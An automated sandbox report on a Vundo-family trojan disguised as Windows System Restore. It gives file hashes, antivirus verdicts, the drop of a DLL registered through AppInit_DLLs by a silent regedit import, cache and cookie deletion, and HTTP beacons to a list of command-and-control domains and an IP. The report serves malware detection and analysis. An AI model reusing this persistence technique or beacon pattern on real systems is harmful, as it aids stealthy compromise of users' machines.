Analysis Date: 2014-10-08 11:37:34
MD5: cfbdd820df44aa36a2575c0f22958b57
SHA1: 0c16b6126fb75b1473f6af9447ec6622f4c78a28

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text  md5: 13cc2cc8e384da536037e937ba7a07c7  sha1: 3b6f047661e98ebbaeda2e7379814973cbfc4313  size: 91136
Section: _ASM2  md5: 1a932c7fa0a0eb8fb6d26f1f8905d189  sha1: 489594f1e9303a2903ffa00476b76b9a4766ce24  size: 63488
Section: .rdata  md5: 697c99e6dde9d3dcac304d26c87cc98b  sha1: 00ef47a581e72f5f3047d4b8886ee2a33260ef4e  size: 8192
Section: .data  md5: 6ae74fc20e4cf7b1e3a120e127950658  sha1: 195f91bc01ed5306654b41943751edba8e59b1c3  size: 5120
Section: .tls  md5: bf619eac0cdf3f68d496ea9344137e8b  sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5  size: 512
Section: .rsrc  md5: c57f9dda23e74dc2dffbaa3c8425f4c6  sha1: b4ae49516f17224939910fb68e13bc1ba5f2c037  size: 34304
Timestamp: 2012-09-26 05:01:05
Version:
LegalCopyright: © Корпорация Майкрософт. Все права защищены.
InternalName: RSTRUI.EXE
FileVersion: 5.1.2600.5512 (xpsp.080413-2108)
CompanyName: Корпорация Майкрософт
ProductName: Операционная система Microsoft® Windows®
ProductVersion: 5.1.2600.5512
FileDescription: Приложение восстановления системы
OriginalFilename: RSTRUI.EXE
Packer: Microsoft Visual C++ ?.?
PEhash: 4d1a23f74f3adcb3ccf36dd24ca511a862182928
IMPhash: 26c8b4c4ce534a10cda2844fc8da413a
AV: 360 Safe - Gen:Variant.Spy.5
AV: Ad-Aware - Gen:Variant.Spy.5
AV: Alwil (avast) - Vundo-XK [Trj]
AV: Arcabit (arcavir) - no_virus
AV: Authentium - W32/Cidox.A.gen!Eldorado
AV: Avira (antivir) - TR/Vundo.Gen7
AV: CA (E-Trust Ino) - Win32/Vundo.N!generic
AV: CAT (quickheal) - Trojan.Vundo.Gen
AV: ClamAV - no_virus
AV: Dr. Web - Trojan.Mayachok.17986
AV: Emsisoft - Gen:Variant.Spy.5
AV: Eset (nod32) - Win32/Kryptik.AMHQ
AV: Fortinet - W32/Citirevo.AB!tr
AV: Frisk (f-prot) - W32/Cidox.A.gen!Eldorado
AV: F-Secure - Gen:Variant.Spy.5
AV: Grisoft (avg) - Generic29.BSEH
AV: Ikarus - Trojan-Downloader.Win32.Vundo
AV: K7 - Backdoor ( 04c4f2bf1 )
AV: Kaspersky - Trojan.Win32.Generic
AV: MalwareBytes - Trojan.FakeMS.ED
AV: Mcafee - Vundo-FASV!CFBDD820DF44
AV: Microsoft Security Essentials - TrojanDropper:Win32/Vundo.V
AV: MicroWorld (escan) - Gen:Variant.Spy.5
AV: Norman - winpe/Vundo.CRIM
AV: Rising - no_virus
AV: Sophos - Mal/Vundo-M
AV: Symantec - Trojan.Gen.2
AV: Trend Micro - TROJ_VUNDO.SMKK
AV: VirusBlokAda (vba32) - TrojanDropper.Daws
AV: Yara APT - no_virus
AV: Zillya! - no_virus

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

Registry: HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL
Creates File: C:\WINDOWS\system32\zzthrqe.dll
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Cookies\cf
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process: C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNS: clickbeta.ru
Winsock DNS: denadb.com
Winsock DNS: vertilaza.com
Winsock DNS: 91.220.35.154
Winsock DNS: terrans.su
Winsock DNS: tryatdns.com
Winsock DNS: clickclans.ru
Winsock DNS: denareclick.com
Winsock DNS: fescheck.com
Winsock DNS: instrango.com
Winsock DNS: verzinla.com
Winsock DNS: getintsu.com
Winsock DNS: tegimode.com
Winsock DNS: netrovad.com
Winsock DNS: nshouse1.com
Winsock DNS: inzavora.com
Winsock DNS: odobvare.com
Winsock DNS: foradns.com
Winsock DNS: getavodes.com
Winsock DNS: clickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\zzthrqe.dll\\x00

Network Details:

DNS: getintsu.com (Type: A) ➝ 141.8.225.80
DNS: getavodes.com (Type: A) ➝ 141.8.225.80
DNS: tryatdns.com (Type: A) ➝ 141.8.225.80
DNS: fescheck.com (Type: A) ➝ 141.8.225.80
DNS: inzavora.com (Type: A) ➝ 141.8.225.80
DNS: vertilaza.com (Type: A)
DNS: verzinla.com\032 (Type: A)
DNS: instrango.com (Type: A)
DNS: netrovad.com (Type: A)
DNS: odobvare.com (Type: A)
DNS: terrans.su (Type: A)
DNS: tegimode.com (Type: A)
DNS: denadb.com (Type: A)
DNS: foradns.com (Type: A)
DNS: clickstano.com (Type: A)
DNS: denareclick.com (Type: A)
DNS: clickbeta.ru (Type: A)
DNS: nshouse1.com (Type: A)
DNS: clickclans.ru (Type: A)
HTTP GET: http://getintsu.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=108&av=0&vm=0&al=0&p=752&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg8mHZFSBCq4YCy4xfEgsXiMOZ/JsN/73VwN7v/dBU0A1
User-Agent:
HTTP GET: http://getavodes.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=108&av=0&vm=0&al=0&p=752&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg8mHZFSBCq4YCy4xfEgsXiMOZ/JsN/73VzSqKc8+o8Cd
User-Agent:
HTTP GET: http://tryatdns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=108&av=0&vm=0&al=0&p=752&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg8mHZFSBCq4YCy4xfEgsXiMOZ/JsN/73VzWYJcslalVd
User-Agent:
HTTP GET: http://fescheck.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=108&av=0&vm=0&al=0&p=752&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg8mHZFSBCq4YCy4xfEgsXiMOZ/JsN/73V5tSrUWFiWIV
User-Agent:
HTTP GET: http://inzavora.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=108&av=0&vm=0&al=0&p=752&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg8mHZFSBCq4YCy4xfEgsXiMOZ/JsN/73VwN7v/dBU0A1
User-Agent:
HTTP GET: http://91.220.35.154/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=108&av=0&vm=0&al=0&p=752&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg8mHZFSBCq4YCy4xfEgsXiMOZ/JsN/73V+ZSgibLVKLa
User-Agent:
Flows TCP: 192.168.1.1:1031 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1036 ➝ 91.220.35.154:80
